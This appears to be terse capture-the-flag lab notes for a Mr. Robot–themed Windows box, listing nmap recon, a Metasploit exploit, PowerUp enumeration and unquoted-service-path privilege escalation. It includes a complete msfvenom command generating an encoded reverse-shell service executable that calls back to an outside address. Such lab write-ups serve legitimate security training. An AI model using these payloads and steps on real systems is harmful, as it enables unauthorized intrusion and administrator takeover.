Steel Mountain | nmap, metasploit, msfvenom

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

idk kev

  1. reverse image search image on page, or check page source
  2. nmap -A <ip>
  3. opening webserver in browser
  4. checking cves on webserver and version
  5. use metasploit exploit, set rhosts and rport
  6. run
  7. move do desktop and get flag
  8. upload PowerUp to target upload <path to file>
  9. load powershell load powershell
  10. enter powershell powershell_shell
  11. load PowerUp.ps1
  12. Invoke-AllChecks
  13. check for restartable services with unquoted service path
  14. generate reverse shell using msfenvom
  15. msfvenom -p windows/shell_reverse_tcp LHOST=10.10.48.224 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
  16. replace real service with generated one
  17. start netcat listener
  18. start and stop service
  19. Profit
Last modified 2023.11.02